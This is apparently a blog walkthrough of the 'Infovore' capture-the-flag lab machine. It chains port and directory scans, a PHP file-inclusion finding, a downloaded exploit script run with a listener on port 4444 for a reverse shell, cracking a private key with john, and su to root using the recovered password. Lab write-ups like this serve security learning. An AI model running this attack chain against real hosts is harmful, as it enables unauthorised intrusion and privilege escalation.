Infovore Walkthrough

We start scanning the host with nmap -A -T4 -p- 192.168.1.20 -vv

Only port 80 is open so we scan it with dirb http://192.168.1.20 /usr/share/dirb/wordlist/big.txt

Nothing is useful, just a fancy page of the site, so let’s run nikto -h 192.168.1.20

This line “/info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake’s list” i made a search and i found an article about LFI with PHP Here

So i decided to run a program i have LFISuite and it came back with a result:

You can also try this input manually and try different LFI, but the program is very fast and time saving.

Now to make use of the exploit we can download this EXPLOIT and change some stuff and run it:

After we change the required lines, we run the script “python exploit_name 192.168.1.20 80 10” and we start a listening port as 4444 in my case:

Listing the directory found two hidden files, one of them is compressed, copy them to /tmp folder and extract:

The file root is a private key we need to decrypt it to get the password, copy the file and save it as rsd on your machine then we use “john” to decrypt it:

The password after the decryption is “choclate93” then we “su” to be root:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s